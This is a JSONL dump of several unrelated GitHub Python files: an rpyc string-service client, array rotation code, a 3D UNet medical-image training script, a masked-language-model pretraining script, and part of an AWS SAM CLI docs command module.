+{"seq_id":"43623559683","text":"import rpyc\nfrom constCS import *\n\n\ndef main() -> None:\n conn_server_name = rpyc.connect(NAME_SERVER_HOST, NAME_SERVER_PORT)\n print(MAIN_SERVER_NAME)\n server_data = conn_server_name.root.lookup(MAIN_SERVER_NAME)\n conn = rpyc.connect(server_data[0], server_data[1])\n\n # Inputs\n first_string = input(\"Input your first string: \")\n second_string = input(\"Input your second string: \")\n operation = input(\"Choose one of the following operations -> Concat, Equal, Distance: \")\n\n # Operations\n if operation == 'Concat':\n response = conn.root.concat(first_string, second_string)\n print(f\"Concatenated strings: {response}\")\n elif operation == 'Distance':\n response = conn.root.levenshtein(first_string, second_string)\n print(f\"Levenshtein Distance: {response}\")\n elif operation == 'Equal':\n response = conn.root.equal(first_string, second_string)\n if response:\n print(\"Strings are equal\")\n else:\n print(\"Strings are not equal\")\n\n else:\n response = \"Operation does not exist\"\n\n\nif __name__ == '__main__':\n main()","repo_name":"DistributedSystems-UFG/servidor-de-nomes-alefiury","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34479808520","text":"# coding=utf-8\n\"\"\"\nauthor = jamon\n\"\"\"\n\nimport time\n\nnum = 3\ndata = [[i+j*num+1 for i in range(0, num)] for j in range(0, num)]\n\n\ndef reverse_row_col(ori_data):\n \"\"\"\n 翻转数组的行列,行做列,列做行\n :param ori_data:\n :return:\n \"\"\"\n row_len = len(data) # 原始行数\n col_len = len(data[0]) # 原始列数\n new_data = [[_ for _ in range(row_len)] for _ in range(col_len)]\n for i in range(col_len):\n for j in range(row_len):\n new_data[i][j] = data[j][i]\n\n return new_data\n\n\ndef reversed(a=[]):\n return [a[i] for i in range(len(a)-1, -1, -1)]\n\n\ndef rotate_array(angle, data):\n \"\"\"\n 核心思想:将原始数组的行做列,列做行产生一个新数组缓存起来,四次旋转的四个结果即为原始数组、缓存的行列转换的数组,\n 原始数组每行逆转,缓存的数组每行逆转\n :param angle: int, 旋转角度,取值范围为[90, 180, 270, 360]\n :param data: list, [[], [], ...]\n :return: list, [[], [], []]\n \"\"\"\n lis = list()\n lis1 = reverse_row_col(data)\n angle = angle % 360 # 数组每旋转360度回到原地\n if 90 == angle:\n for row_index, row in enumerate(lis1):\n lis.append([i for i in reversed(row)])\n elif 180 == angle:\n lis2 = [i for i in reversed(data)]\n for row_index, row in enumerate(lis2):\n lis.append([i for i in reversed(row)])\n elif 270 == angle:\n lis = [i for i in reversed(lis1)]\n else:\n lis = data\n return lis\n\n\ndef rotate_array2(angle, data):\n \"\"\"\n 四种情况:\n 1. 90度,依次去每列第i个元素(降序),如第行数为m, 列数为n,则取第n列第i个元素,第n-1列第i个元素…;\n 2. 180度,依次去每行第i个元素(降序),如第行数为m, 列数为n,则取第i行第n个元素,第i行第n-1个元素…;\n 3. 270度,依次去每列第i个元素(升序),如第行数为m, 列数为n,则取第i列第k个元素,第i+1列第k个元素…;\n 4. 360度,原数组不变\n :param angle: int, 旋转角度,取值范围为[90, 180, 270, 360]\n :param data: list, [[], [], ...]\n :return: list, [[], [], []]\n \"\"\"\n row_len = len(data) # 原始行数\n col_len = len(data[0]) # 原始列数\n temp = col_len - 1\n temp2 = row_len - 1\n angle = angle % 360 # 数组每旋转360度回到原地\n\n if 90 == angle:\n result = [[_ for _ in range(row_len)] for _ in range(col_len)]\n for i in range(0, col_len):\n for j in range(temp2, -1, -1):\n result[i][j] = data[temp2-j][i]\n elif 180 == angle:\n result = [[_ for _ in range(col_len)] for _ in range(row_len)]\n for i in range(0, row_len):\n for j in range(temp, -1, -1):\n result[i][j] = data[temp2-i][temp-j]\n elif 270 == angle:\n result = [[_ for _ in range(row_len)] for _ in range(col_len)]\n for i in range(0, col_len):\n for j in range(temp2, -1, -1):\n result[i][j] = data[j][temp-i]\n else:\n result = data\n\n return result\n\n\nif __name__ == '__main__':\n data = [[2, 3, 4, 5], [5, 6, 7, 8], [9, 10, 11, 12]]\n\n s1 = time.time()\n loop_num = 1 # 101 % 4 = 1,最终结果相当于翻转一次\n for angle in [90, 180, 270, 360]:\n s1 = time.time()\n for i in range(loop_num):\n ret = rotate_array(angle, data)\n s2 = time.time()\n # print(\"x=\", x)\n print(\"\\n{} angle rotate_array {} loop took {}s\".format(angle, loop_num, s2 - s1))\n\n s1 = time.time()\n for i in range(loop_num):\n ret2 = rotate_array2(angle, data)\n s2 = time.time()\n print(\"{} angle rotate_array2 {} loop took {}s\".format(angle, loop_num, s2 - s1))\n\n for r in ret:\n print(r)\n\n print(\"\")\n for r in ret2:\n print(r)\n\n\n\n","repo_name":"yuanchangwang/cheshi","sub_path":"L16 数据结构与算法/oldboy/algo/reverse_array.py","file_name":"reverse_array.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"15867340756","text":"#!/usr/bin/env python3\n\nimport matplotlib \nmatplotlib.use('TkAgg') \nimport numpy as np\nimport os\nimport sys\nimport nibabel as nib\nimport argparse\nfrom loadimUNet3D import loadim\nfrom showim import show3D_1, show3D_2\nimport swapdim\nimport pathfun\nimport config\n\nos.environ['KERAS_BACKEND']='tensorflow'\nsys.path.append('3DUnetCNN-master')\n\nimport tensorflow as tf\n#from keras.preprocessing.image import ImageDataGenerator\nfrom keras.optimizers import RMSprop\nfrom keras.callbacks import ModelCheckpoint\n\n# Standard UNet model\nfrom unet3d.model import unet_model_3d\nfrom unet3d.metrics import dice_coefficient_loss, get_label_dice_coefficient_function, dice_coefficient\n\nparser = argparse.ArgumentParser(description='Label training data')\n#parser.add_argument('values', metavar='N', nargs='+')\nparser.add_argument('-networkdir', action='store', nargs=1)\nparser.add_argument('-gpunum', action='store', nargs=1)\nparser.add_argument('-ws', action='store', nargs=3)\nparser.add_argument('-setupfile', action='store', nargs=1)\nparser.add_argument('-parfile', action='store', nargs=1)\nparser.add_argument('-networkfile0', action='store', nargs=1)\nargs = parser.parse_args()\n\n# The network path\nnetworkdir = args.networkdir[0]\n\n# The network to save\nnetworkfile = os.path.join(networkdir, config.networkbase + '.h5')\n# Name of network for making list of predicted files\ne, f, networkname, ext0 = pathfun.get(networkdir)\nif not os.path.exists(networkdir):\n os.mkdir(networkdir)\n\n# GPU number to use for training\ngpunum = args.gpunum[0]\n\n# Parameter file\ntry:\n parfile = args.parfile[0]\nexcept:\n parfile = os.path.join('tools', config.parfile)\n\n# Initial network file given?\ntry:\n networkfile0 = args.networkfile0[0]\n networkdir0, e, networkbase0, ext0 = pathfun.get(networkfile0)\n msg = 'Pre-existing weights given, remember to assign a correct PARFILE'\n existweights = True\nexcept:\n msg = 'Pre-existing weights not given'\n existweights = False\nprint(msg)\n\n# Import setup file of data sets\nsetupfile = args.setupfile[0]\ndirsetup, n, basesetup, e = pathfun.get(setupfile)\nsys.path.append(dirsetup)\nprint('Import setupfile ' + setupfile)\nsetup = __import__(basesetup)\n\n# Import parameter file\nprint('Import parameter file ' + parfile)\ndirparfile, n, baseparfile, e = pathfun.get(parfile)\nsys.path.append(dirparfile)\nimport importlib\nspec = importlib.util.spec_from_file_location(\"report\", parfile)\nmodule = importlib.util.module_from_spec(spec)\nspec.loader.exec_module(module)\n# https://stackoverflow.com/questions/67631/how-to-import-a-module-given-the-full-path\nif hasattr(module, '__all__'):\n all_names = module.__all__\nelse:\n all_names = [name for name in dir(module) if not name.startswith('_')]\nglobals().update({name: getattr(module, name) for name in all_names})\n\n# List of data sets to train\nlistdatatrain = setup.listdatatrain\n\n# List of subjects to train\nlistsubjtrain = setup.listsubjtrain[0]\n\n# List of masks to train\nlistmasktrain = setup.listmasktrain[0]\n\n# List of subjects to predict\nlistsubjpredict = setup.listsubjpredict[0]\n\n# Lists of data to predict\nlistdatapredict = setup.listdatapredict\n\n# Sequence names\nseqname = setup.seqname\n\n# Number of sequenes\nnseq = len(listdatatrain)\n\n# To print entire array to screen\nnp.set_printoptions(threshold=1e6)\n\n# Load list of masks\npathtrainmask = np.loadtxt(listmasktrain, dtype='str')\n\n# Load list of subjects\nsubjstr = np.loadtxt(listsubjtrain, dtype='str')\n\n# Number of subjects\nndata = len(pathtrainmask)\n\n# Subjects to predict on\nsubjstrpredict = np.loadtxt(listsubjpredict, dtype='str')\nndatapredict = len(subjstrpredict)\n\n# Copy the lists used into a separate folder\ncmd = 'cp ' + listmasktrain + ' ' + networkdir\nprint(cmd)\nos.system(cmd)\n\n# Copy setupfile into separate folder\ncmd = 'cp ' + setupfile + ' ' + networkdir\nprint(cmd)\nos.system(cmd)\n\ncmd = 'cp ' + listsubjtrain + ' ' + networkdir\nprint(cmd)\nos.system(cmd)\n\ncmd = 'cp ' + listsubjpredict + ' ' + networkdir\nprint(cmd)\nos.system(cmd)\n\n# Copy settings file to have the settings for later use\ncmd = 'cp ' + parfile + ' ' + networkdir\nprint(cmd)\nos.system(cmd)\n\nfor pathname in listdatatrain:\n cmd = 'cp ' + pathname + ' ' + networkdir\n print(cmd)\n os.system(cmd)\nfor pathname in listdatapredict:\n cmd = 'cp ' + pathname + ' ' + networkdir\n print(cmd)\n os.system(cmd)\n\n# Load list of training data into a multidimensiontal np char array\npathtraindata = np.empty([ndata, nseq], dtype=object)\ni = 0\nfor s in listdatatrain:\n pathtraindata[:, i] = np.loadtxt(s, dtype='str')\n i = i + 1\n\n# Make list of predicted files using this network\nlistpredicted = np.empty([ndatapredict, 1], dtype='object')\nfor idx, s in enumerate(subjstrpredict):\n s2 = str(s).zfill(3)\n b = os.path.join(config.datadir, s2, config.analysis, 'PREDICTED-NETWORK-' + networkname + '.nii.gz')\n listpredicted[idx] = b\n\n# Make list of predicted files\npathpredicted = os.path.join(networkdir, config.listpredicted)\nprint('Saving list of predicted data: ' + pathpredicted)\nnp.savetxt(pathpredicted, listpredicted, fmt='%s')\n\n# Number of subjects\nprint('Number of subjects: ' + str(ndata))\n\n# Number of channels\nprint('Number of channels: ' + str(nseq))\n\n# Image dimensions\ndim4D = (nseq, dim3D[0], dim3D[1], dim3D[2])\n\n# Number of spatial dimensions\nndim = len(dim3D)\n\n# Number of total samples\nnsamp = nrand + ncent\n\n# Trainingdata\nX = np.zeros((ndata*nsamp, nseq, ws[0], ws[1], ws[2]), dtype='float32')\nY = np.zeros((ndata*nsamp, ws[0], ws[1], ws[2]), dtype='float32')\n\n######################################################################\n# Load the data and do augmentation\n######################################################################\n\ncrand = 0\nsamplec = 0\nndataload = 0\ni = 0\n#i = 58\nfor s in subjstr:\n #s = '260'\n #subj = 260\n subj = s.astype('int')\n print(\"New subject \" + s)\n\n # Array containing whether the data sets exist\n # exist = np.zeros(nseq+1, dtype=bool)\n\n # Load image data\n im4D, nii3D, h, swapax, swapdims = \\\n loadim(pathtraindata[i, :], swap=True)\n h = h[0, :]\n\n # Load training mask\n msg = \"Reading training mask \" + pathtrainmask[i]\n print(msg)\n nii = nib.load(pathtrainmask[i])\n maskload = nii.get_data().astype('float')\n dim = maskload.shape\n header = nii.header\n hmask = header.get_zooms()\n\n print(\"Shape of training mask \" + str(maskload.shape))\n print('Voxelsize of training mask: ' + str(hmask))\n\n # Swap dimensions?\n mask, h, swapax, swapdims = swapdim.swapdim(maskload, h)\n\n # Find the best window placement so the tumor is in the middle of the window\n # OR crop a random placement elsewhere to train the network on background\n maskcrop = np.empty([nsamp, ws[0], ws[1], ws[2]], dtype='float32')\n maskcrop[:] = np.nan\n im4Dcrop = np.empty([nsamp, nseq, ws[0], ws[1], ws[2]], dtype='float32')\n im4Dcrop[:] = np.nan\n\n # The valid data\n valid = np.ones(nsamp, dtype='bool')\n # The range of valid coordinates for a random crop placement\n validc = np.array([[ws[0]/2, dim[0]-ws[0]/2],\n [ws[1]/2, dim[1]-ws[1]/2],\n [ws[2]/2, dim[2]-ws[2]/2]],\n dtype='int').round()\n\n crand = 0\n ccent = 0\n for k in np.arange(nsamp):\n print('Applying cut to sampling ' + str(k))\n\n # k == 0 is the central placement around the mask\n if k < ncent:\n print('Central mask placement')\n placement = 'central'\n else:\n # Random placement\n print('Random mask placement')\n placement = 'random'\n\n while 1:\n if placement == 'central':\n # Find a window placement with the tumor in the middle\n c = np.where(mask > 0)\n elif placement == 'random':\n # Make random coordinates\n c = np.zeros(3, dtype='int')\n for ii in np.arange(3):\n c[ii] = np.random.random_integers(validc[ii][0], validc[ii][1])\n\n start = np.zeros(3, dtype='int')\n stop = np.zeros(3, dtype='int')\n for ii in np.arange(3):\n meanc = np.around(np.mean(c[ii]))\n start[ii] = meanc - np.round(ws[ii]/2)\n stop[ii] = start[ii] + ws[ii]\n\n maskh = mask[start[0]:stop[0], start[1]:stop[1], start[2]:stop[2]]\n imh = im4D[:, start[0]:stop[0], start[1]:stop[1], start[2]:stop[2]]\n equalcropdim = np.array_equal(maskh.shape, ws)\n validcrop = False\n if equalcropdim:\n validcrop = True\n print('Valid crop x: ' + str(start[0]) + ' to ' + str(stop[0]))\n print('Valid crop y: ' + str(start[1]) + ' to ' + str(stop[1]))\n print('Valid crop z: ' + str(start[2]) + ' to ' + str(stop[2]))\n # try:\n # # Crop training data\n # maskh = mask[start[0]:stop[0], start[1]:stop[1], start[2]:stop[2]]\n # imh = im4D[:, start[0]:stop[0], start[1]:stop[1], start[2]:stop[2]]\n # print(maskh.shape)\n # a\n # validcrop = True\n # except:\n # print('Could not crop due to outside image'.upper())\n # validcrop = False\n # break\n\n # show3D_2(imh[0, :, :, :], maskh)\n if validcrop:\n break\n\n if placement == 'central':\n ccent = ccent + 1\n elif placement == 'random':\n crand = crand + 1\n\n #if validcrop:\n maskcrop[k, :, :, :] = maskh\n im4Dcrop[k, :, :, :, :] = imh\n #else:\n # # Dont take this crop for any of the reasons above\n # valid[k] = False\n\n\n #show3D_2(imh[0, :, :, :], maskh)\n\n print('Number of central samples: ' + str(ccent))\n print('Number or random samples: ' + str(crand))\n\n # Pick out the valid data\n maskcrop = maskcrop[valid, :, :, :]\n im4Dcrop = im4Dcrop[valid, :, :, :, :]\n\n # Add to array\n X[samplec:samplec+nsamp, :, :, :, :] = im4Dcrop\n Y[samplec:samplec+nsamp, :, :, :] = maskcrop\n\n # Update global counter\n samplec = samplec + nsamp\n\n i = i + 1\n\n# Restrict to valid data\nX = X[0:samplec+1, :, :, :, :]\nY = Y[0:samplec+1, :, :, :]\n\nmsg = \"Shape of feature data: \" + str(X.shape)\nprint(msg)\nmsg = \"Shape of class data: \" + str(Y.shape)\nprint(msg)\n\n######################################################################\n# Train a deep learning network\n######################################################################\n\ntf.debugging.set_log_device_placement(True)\ncmd = '/device:GPU:' + str(gpunum)\nprint(cmd)\nwith tf.device(cmd):\n\n # From https://github.com/dhuy228/augmented-volumetric-image-generator\n from sklearn.model_selection import train_test_split\n seed = 42\n d = Y.shape\n Y = np.reshape(Y, (d[0], 1, d[1], d[2], d[3]))\n if valsplit > 0:\n X_train_c, X_validation_c, Y_train_c, Y_validation_c = train_test_split(X, Y, test_size=valsplit, random_state=seed)\n else:\n X_train_c = X.copy()\n Y_train_c = Y.copy()\n\n #Y_train_c = np.reshape(Y_train_c, (d[0], 1, d[1], d[2], d[3]))\n #Y_validation_c = np.reshape(Y_validation_c, (d[0], 1, d[1], d[2], d[3]))\n\n from augmented import generator\n if augment:\n image_aug = generator.customImageDataGenerator(\n rotation_range=rotation_range,\n zoom_range=zoom_range,\n width_shift_range=width_shift_range,\n height_shift_range=height_shift_range,\n shear_range=shear_range,\n horizontal_flip=horizontal_flip,\n data_format='channels_first')\n mask_aug = generator.customImageDataGenerator(\n rotation_range=rotation_range,\n zoom_range=zoom_range,\n width_shift_range=width_shift_range,\n height_shift_range=height_shift_range,\n shear_range=shear_range,\n horizontal_flip=horizontal_flip)\n else:\n image_aug = generator.customImageDataGenerator(data_format='channels_first')\n mask_aug = generator.customImageDataGenerator()\n\n X_train_datagen = image_aug.flow(X_train_c, batch_size=batch_size, seed=seed) # set equal seed number\n Y_train_datagen = mask_aug.flow(Y_train_c, batch_size=batch_size, seed=seed) # set equal seed number\n train_generator = zip(X_train_datagen, Y_train_datagen)\n print('Validation split: ' + str(valsplit))\n if valsplit > 0:\n X_validation_datagen = image_aug.flow(X_validation_c, batch_size=batch_size, seed=seed) # set equal seed number\n Y_validation_datagen = mask_aug.flow(Y_validation_c, batch_size=batch_size, seed=seed) # set equal seed number\n validation_generator = zip(X_validation_datagen, Y_validation_datagen)\n\n # # Uncomment to see augmentations\n # import matplotlib.pyplot as plt\n # it = image_aug.flow(X_train_c, batch_size=1, seed=seed)\n # itmask = image_aug.flow(Y_train_c, batch_size=1, seed=seed)\n # for i in range(100):\n # # generate batch of images\n # batch = it.next()\n # batchmask = itmask.next()\n # image = batch[0].astype('float32')\n # image = np.squeeze(image)\n # mask = batchmask[0].astype('float32')\n # mask = np.squeeze(mask)\n # show3D_2(image, mask)\n # # Define the model\n inputshape = (nseq, ws[0], ws[1], ws[2])\n model = unet_model_3d(inputshape,\n pool_size=poolsize,\n n_labels=1,\n initial_learning_rate=lr,\n deconvolution=deconvolution,\n depth=depth,\n n_base_filters=n_base_filters,\n include_label_wise_dice_coefficients=False,\n metrics=dice_coefficient,\n batch_normalization=batch_normalization,\n activation_name=activation_name)\n\n # Print summary\n model.summary()\n #config = model.get_config()\n #print(config)\n #print(config[\"initial_learning_rate\"])\n\n # Compile\n model.compile(optimizer=RMSprop(lr=lr), loss=[dice_coefficient_loss], metrics=[dice_coefficient])\n # model.compile(optimizer=RMSprop(lr=0.0001), loss=dice_loss, metrics=[dice_coeff])\n # Binary crossentropy is not working, why not?\n # model.compile(optimizer=RMSprop(lr=0.0001), loss='binary_crossentropy', metrics=[dice_coeff])\n\n # Load pre-existing model weights?\n if existweights:\n msg = \"Loading model \" + networkfile0\n print(msg)\n model.load_weights(networkfile0)\n #from keras.models import load_model\n #model = load_model(networkfile0)\n\n # Save network to disc for each epoch\n checkpointer = ModelCheckpoint(filepath=networkfile, verbose=1)\n\n # Early stopping?\n from keras.callbacks import EarlyStopping\n usualCallback = EarlyStopping()\n fitCallback = EarlyStopping(monitor='loss', min_delta=0, patience=30)\n\n # Fit model\n if valsplit > 0:\n history = model.fit_generator(\n train_generator,\n steps_per_epoch=len(Y_train_c) // batch_size,\n epochs=epochs,\n validation_data=validation_generator,\n validation_steps=len(Y_validation_c) // batch_size,\n callbacks=[checkpointer, fitCallback]\n )\n else:\n history = model.fit_generator(\n train_generator,\n steps_per_epoch=len(Y_train_c) // batch_size,\n epochs=epochs,\n callbacks=[checkpointer, fitCallback]\n )\n\n\n #history = model.fit(X, Y, batch_size=batch_size, epochs=epochs, callbacks=[checkpointer, fitCallback], validation_split=valsplit)\n msg = \"Saving model \" + networkfile\n print(msg)\n model.save(networkfile)\n\n # Save training loss\n pathsave = os.path.join(networkdir, config.trainloss)\n print('Saving train loss: ' + pathsave)\n np.savetxt(pathsave, history.history['loss'], fmt='%s')\n\n # Save training cost function\n pathsave = os.path.join(networkdir, config.traincost)\n print('Saving train cost: ' + pathsave)\n np.savetxt(pathsave, history.history['dice_coefficient'], fmt='%s')\n\n if valsplit > 0:\n # Save validation loss\n pathsave = os.path.join(networkdir, config.valloss)\n print('Saving validation loss: ' + pathsave)\n np.savetxt(pathsave, history.history['val_loss'], fmt='%s')\n\n # Save validation cost function\n pathsave = os.path.join(networkdir, config.valcost)\n print('Saving validation cost: ' + pathsave)\n np.savetxt(pathsave, history.history['val_dice_coefficient'], fmt='%s')\n\n\n","repo_name":"ehodneland/RadioGenomicsEC","sub_path":"tools.python/trainUNet3D.py","file_name":"trainUNet3D.py","file_ext":"py","file_size_in_byte":16766,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"10027528295","text":"\nimport copy\nimport gc\nimport json\nimport math\nimport os\nimport pickle\nimport random\nimport re\nimport sys\nimport time\nimport warnings\n\nimport numpy as np\nimport pandas as pd\nimport scipy as sp\nimport tokenizers\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport transformers\nfrom datasets import load_dataset\nimport wandb\nfrom iterstrat.ml_stratifiers import MultilabelStratifiedKFold\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import GroupKFold, KFold, StratifiedKFold, train_test_split\nfrom torch.nn import Parameter\nfrom torch.optim import SGD, Adam, AdamW\nfrom torch.utils.data import DataLoader, Dataset\nfrom tqdm.auto import tqdm\nfrom transformers import (AutoConfig, AutoModel, AutoModelForMaskedLM, AutoTokenizer,\n DataCollatorForLanguageModeling, Trainer, TrainingArguments,\n get_cosine_schedule_with_warmup,\n get_linear_schedule_with_warmup)\n\n\nimport yaml\nimport shutil\nfrom attrdict import AttrDict\nimport logzero\n\nfrom utils import get_score, get_args, convert_dot_dict\nfrom engine import train_loop\nfrom process import process\n\nsys.path.append('./base_exp')\n\nwarnings.filterwarnings(\"ignore\")\n\npd.set_option('display.max_rows', 500)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\n\n\nos.environ['TOKENIZERS_PARALLELISM'] = 'true'\n\ndef load_2021():\n competition_path = '../input/feedback-prize-2021/'\n train_df = pd.read_csv(competition_path + 'train.csv')\n test_df = pd.read_csv(competition_path + 'sample_submission.csv')\n dfs = [train_df, test_df]\n essay_texts = {}\n for i, phase in enumerate(['train', 'test']):\n base_path = competition_path + phase + '/'\n\n\n for filename in os.listdir(base_path):\n with open(base_path + filename) as f:\n text = f.readlines()\n full_text = ' '.join([x for x in text])\n essay_text = ' '.join([x for x in full_text.split()])\n essay_texts[filename[:-4]] = essay_text\n \n df = pd.Series(essay_texts).to_frame().reset_index().rename(columns={'index': 'id', 0: 'full_text'})\n print(df.head())\n return df\n\ndef load_2021_and_remove_duplicates():\n df_2021 = load_2021()\n print(f'2021 shape: {df_2021.shape}')\n df_fb3 = pd.read_csv('../input/feedback-prize-english-language-learning/train.csv')\n id_2021 = df_2021['id'].values.tolist()\n id_fb3 = df_fb3['text_id'].values.tolist()\n duplicates = set(id_2021) & set(id_fb3)\n print(f'Found {len(duplicates)} duplicates')\n df_2021 = df_2021[~df_2021['id'].isin(duplicates)].reset_index(drop=True)\n print(f'2021 shape after removing duplicates: {df_2021.shape}')\n return df_2021\n\n\n\ndef main():\n args = get_args()\n with open(args.config_path, 'r') as f:\n CFG = yaml.safe_load(f)\n debug = args.debug\n\n CFG = AttrDict(CFG)\n # print(cfg)\n # https://github.com/bcj/AttrDict/issues/34\n CFG._setattr('_sequence_type', list)\n\n if hasattr(CFG, 'output_dir'):\n exp_name = CFG.output_dir.split('/')[-2]\n else:\n exp_name = CFG.output_dir.value.split('/')[-2]\n\n if not debug:\n wandb.init(project='mlm', entity='ktm98',\n config=CFG, name=f'{exp_name}')\n CFG = AttrDict(convert_dot_dict(dict(wandb.config)))\n CFG._setattr('_sequence_type', list)\n wandb.run.log_code(\".\")\n print(type(CFG))\n \n os.makedirs(CFG.output_dir, exist_ok=True)\n\n shutil.copyfile(args.config_path, CFG.output_dir+'params.yml')\n\n LOGGER = logzero.setup_logger(\n logfile=CFG.output_dir+'train.log', level=20, fileLoglevel=20)\n\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n\n train_df = pd.read_csv('../input/feedback-prize-english-language-learning/train.csv')\n test_df = pd.read_csv('../input/feedback-prize-english-language-learning/test.csv')\n submission_df = pd.read_csv('../input/feedback-prize-english-language-learning/sample_submission.csv')\n\n if CFG.use_2021:\n train_df_2021 = load_2021()\n train_df = pd.concat([train_df, train_df_2021], axis=0)\n\n train_df = process(train_df)\n\n if debug:\n train_df = train_df.head(100)\n\n train_text_list, val_text_list = train_test_split(train_df['full_text'].values, test_size=0.25, random_state=CFG.seed)\n\n tokenizer = AutoTokenizer.from_pretrained(CFG.model)\n\n if CFG.add_new_token:\n new_tokens = ['STUDENT_NAME', 'PROPER_NAME', 'Generic_Name', 'Generic_School', 'LOCATION_NAME', 'OTHER_NAME', 'RESTAURANT_NAME',\n 'TEACHER_NAME', 'STORE_NAME', 'LANGUAGE_NAME', 'Generic_City', '']\n tokenizer.add_special_tokens({'additional_special_tokens': new_tokens})\n\n\n tokenizer.save_pretrained(CFG.output_dir+'tokenizer/')\n CFG.tokenizer = tokenizer\n\n \n # =============== mlm ===============\n mlm_train_json_path = CFG.output_dir + f'train_mlm.json'\n mlm_valid_json_path = CFG.output_dir + f'valid_mlm.json'\n\n for json_path, list_ in zip([mlm_train_json_path, mlm_valid_json_path],\n [train_text_list, val_text_list]):\n with open(str(json_path), 'w') as f:\n for sentence in list_:\n row_json = {'text': sentence}\n json.dump(row_json, f)\n f.write('\\n')\n datasets = load_dataset(\n 'json',\n data_files={'train': str(mlm_train_json_path),\n 'valid': str(mlm_valid_json_path)},\n )\n\n def tokenize_function(examples):\n return tokenizer(examples[\"text\"], max_length=CFG.max_len)\n\n tokenized_datasets = datasets.map(\n tokenize_function,\n batched=True,\n num_proc=1,\n remove_columns=[\"text\"],\n batch_size=CFG.batch_size)\n data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm_probability=CFG.mlm_probability)\n config = AutoConfig.from_pretrained(CFG.model, output_hidden_states=True)\n model = AutoModelForMaskedLM.from_pretrained(CFG.model, config=config)\n\n\n training_args = TrainingArguments(\n output_dir=CFG.output_dir,\n evaluation_strategy=\"epoch\",\n learning_rate=CFG.lr,\n weight_decay=CFG.weight_decay,\n save_strategy='no',\n per_device_train_batch_size=CFG.batch_size,\n num_train_epochs=CFG.epochs,\n # report_to=\"wandb\",\n run_name=exp_name,\n logging_dir=CFG.output_dir + 'logs/',\n lr_scheduler_type=CFG.scheduler,\n warmup_ratio=CFG.warmup_ratio,\n fp16=True,\n logging_steps=500,\n gradient_accumulation_steps=CFG.gradient_accumulation_steps,\n seed=CFG.seed,\n gradient_checkpointing=CFG.gradient_checkpointing,\n )\n\n trainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=tokenized_datasets[\"train\"],\n eval_dataset=tokenized_datasets['valid'],\n data_collator=data_collator,\n # optimizers=(optimizer, scheduler)\n )\n\n trainer.train()\n trainer.model.save_pretrained(CFG.output_dir + f'mlm_{CFG.model.split(\"/\")[-1]}')\n\n\nif __name__ == '__main__':\n main()","repo_name":"ktm98/kaggle-feedback-prize-3","sub_path":"base_exp/mlm.py","file_name":"mlm.py","file_ext":"py","file_size_in_byte":7180,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"16808813797","text":"import functools\nimport os\nimport sys\nfrom typing import Callable, List\n\nfrom click import echo\n\nfrom samcli.cli.main import common_options, print_cmdline_args\nfrom samcli.commands.docs.exceptions import InvalidDocsCommandException\nfrom samcli.lib.docs.browser_configuration import BrowserConfiguration, BrowserConfigurationError\nfrom samcli.lib.docs.documentation import Documentation\nfrom samcli.lib.telemetry.metric import track_command\n\nCOMMAND_NAME = \"docs\"\n\nSUCCESS_MESSAGE = \"Documentation page opened in a browser.\"\nERROR_MESSAGE = \"Failed to open a web browser. Use the following link to navigate to the documentation page: {URL}\"\n\n\nclass DocsCommandContext:\n def get_complete_command_paths(self) -> List[str]:\n \"\"\"\n Get a list of strings representing the fully qualified commands invokable by sam docs\n\n Returns\n -------\n List[str]\n A string list of commands including the base command\n \"\"\"\n return [self.base_command + \" \" + command for command in self.all_commands]\n\n @property\n def command_callback(self) -> Callable[[str], None]:\n \"\"\"\n Returns the callback function as a callable with the sub command string\n \"\"\"\n impl = CommandImplementation(command=self.sub_command_string)\n return functools.partial(impl.run_command)\n\n @property\n def all_commands(self) -> List[str]:\n \"\"\"\n Returns all the commands from the commands list in the docs config\n \"\"\"\n return list(Documentation.load().keys())\n\n @property\n def sub_command_string(self) -> str:\n \"\"\"\n Returns a string representation of the sub-commands\n \"\"\"\n return \" \".join(self.sub_commands)\n\n @property\n def sub_commands(self) -> List[str]:\n \"\"\"\n Returns the filtered command line arguments after \"sam docs\"\n \"\"\"\n return self._filter_arguments(sys.argv[2:])\n\n @property\n def base_command(self) -> str:\n \"\"\"\n Returns a string representation of the base command (e.g \"sam docs\")\n\n click.get_current_context().command_path returns the entire command by the time it\n gets to the leaf node. We just want \"sam docs\" so we extract it from that string\n \"\"\"\n return f\"sam {COMMAND_NAME}\"\n\n @staticmethod\n def _filter_arguments(commands: List[str]) -> List[str]:\n \"\"\"\n Take a list of command line arguments and filter out all flags\n\n Parameters\n ----------\n commands: List[str]\n The command line arguments\n\n Returns\n -------\n List of strings after filtering it all flags\n\n \"\"\"\n return list(filter(lambda arg: not arg.startswith(\"-\"), commands))\n\n\nclass CommandImplementation:\n def __init__(self, command: str):\n \"\"\"\n Constructor used for instantiating a command implementation object\n\n Parameters\n ----------\n command: str\n Name of the command that is being executed\n \"\"\"\n self.command = command\n self.docs_command = DocsCommandContext()\n\n @track_command\n @print_cmdline_args\n @common_options\n def run_command(self):\n \"\"\"\n Run the necessary logic for the `sam docs` command\n\n Raises\n ------\n InvalidDocsCommandException\n \"\"\"\n if self.docs_command.sub_commands and self.command not in self.docs_command.all_commands:\n raise InvalidDocsCommandException(\n f\"Command not found. Try using one of the following available commands:{os.linesep}\"\n f\"{os.linesep.join([command for command in self.docs_command.get_complete_command_paths()])}\"\n )\n browser = BrowserConfiguration()\n documentation = Documentation(browser=browser, command=self.command)\n try:\n documentation.open_docs()\n except BrowserConfigurationError:\n echo(ERROR_MESSAGE.format(URL=documentation.url), err=True)\n else:\n 